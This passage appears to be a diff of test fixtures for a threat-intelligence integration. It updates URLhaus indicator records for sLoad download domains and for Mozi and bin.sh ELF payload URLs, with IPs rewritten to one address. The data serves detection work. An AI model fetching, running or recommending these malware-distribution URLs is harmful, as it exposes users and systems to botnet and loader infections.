"indicator", @@ -5750,7 +5750,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692910833Z", + "ingested": "2021-12-13T08:40:08.025361Z", "original": "{\"id\":\"961427\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961427/\",\"url\":\"https://letonguesc.com/leto/CMPDVD69C11G693Z/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:48:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5796,7 +5796,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692914400Z", + "ingested": "2021-12-13T08:40:08.025367800Z", "original": "{\"id\":\"961426\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961426/\",\"url\":\"https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5842,7 +5842,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692917616Z", + "ingested": "2021-12-13T08:40:08.025374700Z", "original": "{\"id\":\"961421\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961421/\",\"url\":\"https://cxminute.com/minu/PRSSFN72L18C573S/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5888,7 +5888,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692920712Z", + "ingested": "2021-12-13T08:40:08.025381600Z", "original": "{\"id\":\"961422\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961422/\",\"url\":\"https://ladiesincode.com/ladi/00814870150/1x1.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5934,7 +5934,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692923948Z", + "ingested": "2021-12-13T08:40:08.025388400Z", "original": "{\"id\":\"961423\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961423/\",\"url\":\"https://ladiesincode.com/ladi/03635540234/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5980,7 +5980,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692927174Z", + "ingested": "2021-12-13T08:40:08.025395300Z", "original": "{\"id\":\"961424\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961424/\",\"url\":\"https://univirtek.com/viro/PLCSFN62B11D548Q/map.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6026,7 +6026,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692930470Z", + "ingested": "2021-12-13T08:40:08.025402200Z", "original": "{\"id\":\"961425\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961425/\",\"url\":\"https://univirtek.com/viro/03294650167/maps.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6072,7 +6072,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692933536Z", + "ingested": "2021-12-13T08:40:08.025409200Z", "original": "{\"id\":\"961418\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961418/\",\"url\":\"https://univirtek.com/viro/GGLSCR73D17C627Q/blank.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6118,7 +6118,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692936612Z", + "ingested": "2021-12-13T08:40:08.025416100Z", "original": "{\"id\":\"961419\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961419/\",\"url\":\"https://univirtek.com/viro/CRRLRA68A70H501X/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6164,7 +6164,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692939747Z", + "ingested": "2021-12-13T08:40:08.025422900Z", "original": "{\"id\":\"961420\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961420/\",\"url\":\"https://ladiesincode.com/ladi/CRSNLD59R12L840V/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6210,7 +6210,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692943084Z", + "ingested": "2021-12-13T08:40:08.025429800Z", "original": "{\"id\":\"961416\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961416/\",\"url\":\"https://belfetproduction.com/bella/RTTCRL58M29A794D/logo.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6256,7 +6256,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692946781Z", + "ingested": "2021-12-13T08:40:08.025436500Z", "original": "{\"id\":\"961417\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961417/\",\"url\":\"https://letonguesc.com/leto/04138120169/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6302,7 +6302,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692950037Z", + "ingested": "2021-12-13T08:40:08.025443400Z", "original": "{\"id\":\"961408\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961408/\",\"url\":\"https://letonguesc.com/leto/SPGMRC73H13A475I/it.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6348,7 +6348,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692953293Z", + "ingested": "2021-12-13T08:40:08.025450300Z", "original": "{\"id\":\"961409\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961409/\",\"url\":\"https://letonguesc.com/leto/80007070552/it.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6394,7 +6394,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692956549Z", + "ingested": "2021-12-13T08:40:08.025457200Z", "original": "{\"id\":\"961410\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961410/\",\"url\":\"https://letonguesc.com/leto/02482130271/logo.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6440,7 +6440,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692960025Z", + "ingested": "2021-12-13T08:40:08.025464Z", "original": "{\"id\":\"961411\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961411/\",\"url\":\"https://univirtek.com/viro/15730201009/uk.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6486,7 +6486,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692964023Z", + "ingested": "2021-12-13T08:40:08.025471Z", "original": "{\"id\":\"961412\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961412/\",\"url\":\"https://univirtek.com/viro/01074480250/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6532,7 +6532,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692967850Z", + "ingested": "2021-12-13T08:40:08.025477900Z", "original": "{\"id\":\"961413\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961413/\",\"url\":\"https://cxminute.com/minu/SCHRKE77C47G224W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6578,7 +6578,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692989280Z", + "ingested": "2021-12-13T08:40:08.025484900Z", "original": "{\"id\":\"961414\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961414/\",\"url\":\"https://cxminute.com/minu/04281560377/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6624,7 +6624,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692997035Z", + "ingested": "2021-12-13T08:40:08.025491800Z", "original": "{\"id\":\"961415\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961415/\",\"url\":\"https://ladiesincode.com/ladi/02613440060/maps.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6670,7 +6670,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693001654Z", + "ingested": "2021-12-13T08:40:08.025498700Z", "original": "{\"id\":\"961406\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961406/\",\"url\":\"https://nowyouknowent.com/werdona/PLLRRT83A05H501O/it.gif\",\"url_status\":\"offline\",\"host\":\"nowyouknowent.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6716,7 +6716,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693005431Z", + "ingested": "2021-12-13T08:40:08.025505500Z", "original": "{\"id\":\"961407\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961407/\",\"url\":\"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png\",\"url_status\":\"offline\",\"host\":\"hoagtechhydroponics.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6762,7 +6762,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693009007Z", + "ingested": "2021-12-13T08:40:08.025512400Z", "original": "{\"id\":\"961404\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961404/\",\"url\":\"https://belfetproduction.com/bella/00160060349/uk.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6808,7 +6808,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693023855Z", + "ingested": "2021-12-13T08:40:08.025519300Z", "original": "{\"id\":\"961405\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961405/\",\"url\":\"https://belfetproduction.com/bella/01288650243/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6848,18 +6848,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://117.251.59.53:50611/bin.sh", + "original": "http://89.160.20.156:50611/bin.sh", "scheme": "http", "port": 50611, - "domain": "117.251.59.53", - "full": "http://117.251.59.53:50611/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50611/bin.sh" }, - "ip": "117.251.59.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693033143Z", - "original": "{\"id\":\"961403\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961403/\",\"url\":\"http://117.251.59.53:50611/bin.sh\",\"url_status\":\"online\",\"host\":\"117.251.59.53\",\"date_added\":\"2021-01-14 20:39:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.025526200Z", + "original": "{\"id\":\"961403\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961403/\",\"url\":\"http://89.160.20.156:50611/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:39:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6897,18 +6897,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://60.243.120.169:45371/Mozi.a", + "original": "http://89.160.20.156:45371/Mozi.a", "scheme": "http", "port": 45371, - "domain": "60.243.120.169", - "full": "http://60.243.120.169:45371/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45371/Mozi.a" }, - "ip": "60.243.120.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693038312Z", - "original": "{\"id\":\"961402\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961402/\",\"url\":\"http://60.243.120.169:45371/Mozi.a\",\"url_status\":\"online\",\"host\":\"60.243.120.169\",\"date_added\":\"2021-01-14 20:36:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025533Z", + "original": "{\"id\":\"961402\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961402/\",\"url\":\"http://89.160.20.156:45371/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6946,18 +6946,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.54.50.155:50093/Mozi.m", + "original": "http://89.160.20.156:50093/Mozi.m", "scheme": "http", "port": 50093, - "domain": "61.54.50.155", - "full": "http://61.54.50.155:50093/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50093/Mozi.m" }, - "ip": "61.54.50.155" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693042230Z", - "original": "{\"id\":\"961400\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961400/\",\"url\":\"http://61.54.50.155:50093/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.54.50.155\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025539800Z", + "original": "{\"id\":\"961400\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961400/\",\"url\":\"http://89.160.20.156:50093/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -6995,18 +6995,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.95.175.109:36652/Mozi.m", + "original": "http://89.160.20.156:36652/Mozi.m", "scheme": "http", "port": 36652, - "domain": "59.95.175.109", - "full": "http://59.95.175.109:36652/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36652/Mozi.m" }, - "ip": "59.95.175.109" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693046137Z", - "original": "{\"id\":\"961401\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961401/\",\"url\":\"http://59.95.175.109:36652/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.95.175.109\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025546700Z", + "original": "{\"id\":\"961401\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961401/\",\"url\":\"http://89.160.20.156:36652/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7044,18 +7044,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.235.65.235:54182/Mozi.m", + "original": "http://89.160.20.156:54182/Mozi.m", "scheme": "http", "port": 54182, - "domain": "42.235.65.235", - "full": "http://42.235.65.235:54182/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54182/Mozi.m" }, - "ip": "42.235.65.235" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693049574Z", - "original": "{\"id\":\"961397\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961397/\",\"url\":\"http://42.235.65.235:54182/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.235.65.235\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025555600Z", + "original": "{\"id\":\"961397\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961397/\",\"url\":\"http://89.160.20.156:54182/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7093,18 +7093,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.177.178:46048/Mozi.m", + "original": "http://89.160.20.156:46048/Mozi.m", "scheme": "http", "port": 46048, - "domain": "222.137.177.178", - "full": "http://222.137.177.178:46048/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46048/Mozi.m" }, - "ip": "222.137.177.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693053030Z", - "original": "{\"id\":\"961398\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961398/\",\"url\":\"http://222.137.177.178:46048/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.177.178\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025562700Z", + "original": "{\"id\":\"961398\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961398/\",\"url\":\"http://89.160.20.156:46048/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7142,18 +7142,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.232.114:33953/Mozi.m", + "original": "http://89.160.20.156:33953/Mozi.m", "scheme": "http", "port": 33953, - "domain": "222.137.232.114", - "full": "http://222.137.232.114:33953/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33953/Mozi.m" }, - "ip": "222.137.232.114" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693056456Z", - "original": "{\"id\":\"961399\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961399/\",\"url\":\"http://222.137.232.114:33953/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.232.114\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025569900Z", + "original": "{\"id\":\"961399\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961399/\",\"url\":\"http://89.160.20.156:33953/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7191,18 +7191,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.117.10.46:36447/Mozi.a", + "original": "http://89.160.20.156:36447/Mozi.a", "scheme": "http", "port": 36447, - "domain": "182.117.10.46", - "full": "http://182.117.10.46:36447/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36447/Mozi.a" }, - "ip": "182.117.10.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693059622Z", - "original": "{\"id\":\"961393\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961393/\",\"url\":\"http://182.117.10.46:36447/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.10.46\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025576800Z", + "original": "{\"id\":\"961393\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961393/\",\"url\":\"http://89.160.20.156:36447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -7240,18 +7240,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://171.38.193.49:36828/Mozi.m", + "original": "http://89.160.20.156:36828/Mozi.m", "scheme": "http", "port": 36828, - "domain": "171.38.193.49", - "full": "http://171.38.193.49:36828/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36828/Mozi.m" }, - "ip": "171.38.193.49" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693063560Z", - "original": "{\"id\":\"961394\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961394/\",\"url\":\"http://171.38.193.49:36828/Mozi.m\",\"url_status\":\"online\",\"host\":\"171.38.193.49\",\"date_added\":\"2021-01-14 20:35:05 